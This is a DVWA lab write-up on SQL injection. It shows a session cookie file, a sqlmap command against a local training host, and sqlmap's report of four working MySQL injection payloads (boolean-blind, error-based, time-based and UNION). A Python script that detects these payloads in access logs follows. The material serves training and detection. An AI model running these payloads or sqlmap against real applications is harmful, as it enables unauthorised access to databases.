:: SQL Injection

Difficulty: low

First, you need to get your session cookie.

It contains two values: security and PHPSESSID.

cookie.example

```
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

#HttpOnly_dvwa.localtest	FALSE	/	FALSE	0	security	low
#HttpOnly_dvwa.localtest	FALSE	/	FALSE	0	PHPSESSID	40960938862d71bc6784707596f3ea7b
```

Then pass it to sqlmap so that it reuses your authenticated session.

Run sqlmap

For readability, we change the parameter order from ?id=1&Submit=Submit to ?Submit=Submit&id=1

```
# -p id: test only the id parameter; --flush-session: discard cached results for this target
sqlmap -u "http://dvwa.localtest/vulnerabilities/sqli/?&Submit=Submit&id=1" \
-p id \
--dbms MySQL \
--cookie="PHPSESSID=40960938862d71bc6784707596f3ea7b;security=low" \
--flush-session
```

```
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: &Submit=Submit&id=1' OR NOT 9429=9429#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: &Submit=Submit&id=1' AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(4029=4029,1))),0x71766a7871),4029)-- OMXo

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: &Submit=Submit&id=1' AND (SELECT 5372 FROM (SELECT(SLEEP(5)))ETkC)-- HPiV

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: &Submit=Submit&id=1' UNION ALL SELECT CONCAT(0x717a717871,0x73734746736a4f4144504b775242724f7763485563586c4f594c73447a436a594d49724e7a5a6475,0x71766a7871),NULL#
---
[21:02:46] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.19.2, PHP 7.1.33
back-end DBMS: MySQL >= 5.6
```
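
Each of the four techniques sqlmap reported above leaves a recognisable value in the `id` parameter of the web server's access log. The following is an added example, not part of the original notes: it classifies access-log request lines by technique. The log lines are constructed, and the regexes and the `classify` / `sample_line` helpers are assumptions tuned to the payloads shown here, not a complete ruleset.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Keys reuse the technique names from the sqlmap output above.
# Patterns are illustrative assumptions, matched against decoded parameter values.
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*(?:OR|AND)\s+(?:NOT\s+)?(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"\bGTID_SUBSET\s*\(", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify(log_line):
    """Return the sorted technique names found in any query parameter value."""
    m = REQUEST.search(log_line)
    if not m:
        return []  # not a request line we understand
    hits = set()
    # parse_qsl percent-decodes values, so %27 becomes ' and %23 becomes #
    for _name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        for technique, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.add(technique)
    return sorted(hits)


def sample_line(id_value):
    """Build a constructed access log line for the DVWA URL used on this page."""
    path = "/vulnerabilities/sqli/?Submit=Submit&id=" + quote(id_value, safe="")
    return f'192.0.2.10 - - [01/Jan/2024:21:02:46 +0000] "GET {path} HTTP/1.1" 200 1523 "-" "-"'


# Constructed sample input: a normal request plus the payload shapes from the output above
# (the UNION payload is shortened).
SAMPLES = [
    "1",
    "1' OR NOT 9429=9429#",
    "1' AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(4029=4029,1))),0x71766a7871),4029)-- OMXo",
    "1' AND (SELECT 5372 FROM (SELECT(SLEEP(5)))ETkC)-- HPiV",
    "1' UNION ALL SELECT NULL,NULL#",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(classify(sample_line(value)) or ["clean"], value)
```

Matching on the decoded value matters: the raw log line contains `%27` and `%23`, so patterns written against the literal payload text would miss it.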

Try: